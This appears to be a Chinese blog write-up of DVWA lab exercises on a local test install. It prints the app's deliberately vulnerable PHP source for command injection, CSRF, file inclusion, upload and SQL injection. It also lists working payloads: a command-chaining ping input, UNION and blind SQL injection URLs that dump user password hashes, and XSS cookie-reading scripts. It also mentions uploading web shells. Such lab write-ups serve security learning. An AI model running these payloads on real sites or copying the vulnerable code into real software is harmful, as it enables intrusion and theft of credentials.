Brute Force(暴力破解)
简单:参考pikachu通关全记录 中的# 0x01 Burt Force(暴力破解漏洞)。
Command Injection
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$target = $_REQUEST[ 'ip' ];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
?>
从源代码中,我们可以看出,用户通过输入ping命令,执行系统命令。然后根据服务器是否是Windows NT系统,对目标ip进行不同的ping测试。
- 8.142.189.231 || ipconfig 效果如下:
CSRF
观察其url:
http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=%E6%94%B9%E5%8F%98#
查看源代码:
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
从源代码中,我们看出没有任何防护措施,例如token、验证码这些东西都没有加,安全性能低。只需要将链接发送给用户点击,攻击即可完成!
File Inclusion
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
- http://127.0.0.1/dvwa/vulnerabilities/fi/?page=E:/phpstudy/WWW/123.txt
- 读取 www下的123.txt文件;
- 效果如下:
从上面图片可以看出通过该漏洞可以进行文件包含漏洞的利用,包括本地文件包含和远程文件包含进行本地信息读取等,远程包含shell等操作。
不知道为什么相对路径不行?试了一下远程文件包含没有成功,如果抛开环境问题,应该是远程文件包含。
修复方案:
1.禁止远程文件包含allow_url_include=off
2.配置open_basedir=指定目录,限制访问区域。
3.过滤../等特殊符号
4.修改Apache日志文件的存放地址
5.开启魔术引号magic_quotes_qpc=on
6.尽量不要使用动态变量调用文件,直接写要包含的文件
File Upload
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
未对传入的文件做过滤等操作,可直接上传PHP文件,直接包含一句话用菜刀或者蚁剑等工具即可直接连接。或者用metasploit生成PHP文件,去连接!!!
Insecure CAPTCHA
- 环境没有搭好,以后再弄
SQL Injection
<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
// Get input
$id = $_REQUEST[ 'id' ];
switch ($_DVWA['SQLI_DB']) {
case MYSQL:
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
mysqli_close($GLOBALS["___mysqli_ston"]);
break;
case SQLITE:
global $sqlite_db_connection;
#$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
#$sqlite_db_connection->enableExceptions(true);
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
#print $query;
try {
$results = $sqlite_db_connection->query($query);
} catch (Exception $e) {
echo 'Caught exception: ' . $e->getMessage();
exit();
}
if ($results) {
while ($row = $results->fetchArray()) {
// Get values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
} else {
echo "Error in fetch ".$sqlite_db->lastErrorMsg();
}
break;
}
}
?>
通过代码分析,通过get传参,传入后端拼接到"SELECT first_name, last_name FROM users WHERE user_id = '$id';";执行
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='1&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='2&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 5--+&Submit=Submit#
查询字段数:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20order%20by%202--+&Submit=Submit#
查询操作系统、版本:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=0%27%20union%20select%201,2--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20database(),version()%20--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20@@version_compile_os,version()%20--+&Submit=Submit#
- 得出数据库名称: dvwa 版本号:5.5.53 操作系统:Win32
查询全部数据库名称:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(schema_name),1 from information_schema.schemata --+&Submit=Submit#
查询dvwa数据库下的所有表:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema=database() --+&Submit=Submit#
或者:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema='dvwa' --+&Submit=Submit#
查询所有 users 表的字段名
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(column_name),1 from information_schema.columns where table_name='users' --+&Submit=Submit#
查询所有 users 表的字段值 http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(user_id,0x3a,user,0x2c,password,0x3b),1 from users --+&Submit=Submit#
SQL Injection(Blind)
进行’数字型‘和’字符型‘判断:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1 and 1=3&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%273&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%271&Submit=Submit#
- 结论:判断该类型为字符型,且为单引号注入。
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())%3E5%20--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())=4%20--+&Submit=Submit#
- 说明数据库长度为4
| 输入语句 | 显示结果 |
|---|---|
| 1’ and ascii(substr(database(),1,1))>97# | 显示存在,说明第一个字符是一个小写字母且不是a。 |
| 1’ and ascii(substr(database(),1,1))=100# | 显示存在,说明第一个是d |
| 1’ and ascii(substr(database(),2,1))=118# | 显示存在,说明第二个是v |
| 1’ and ascii(substr(database(),3,1))=119# | 显示存在,说明第三个是w |
| 1’ and ascii(substr(database(),4,1))=97# | 显示存在,说明第四个是a |
-
数据库名称为:dvwa
-
对表的长度进行判断:
| 输入语句 | 显示结果 |
|---|---|
| 1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10# | 不存在 |
| 1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>8# | 存在,说明dvwa第一个表长度为9 |
| 1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9# | 存在,验证成功 |
| 同理可以对第二个表的长度进行猜测: | |
| 1’ and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5# | 存在,dvwa第二个表长度为5 |
- 哎!反正就是不停的去尝试,方法如上所示。在我的另一篇博客中完整写到过盲注全过程 点击跳转
XSS(DOM)
127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script>
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Reflected)
127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>#
- 懵了啊,啥过滤都没有
XSS (Stored)
-
哎!也是啥过滤都没有
-
那么这个存储型xss,它不会随着页面重新加载js事件而改变,其存储在数据库,下一次刷新页面后依旧会执行该js语句。
我正在参与掘金技术社区创作者签约计划招募活动,点击链接报名投稿。
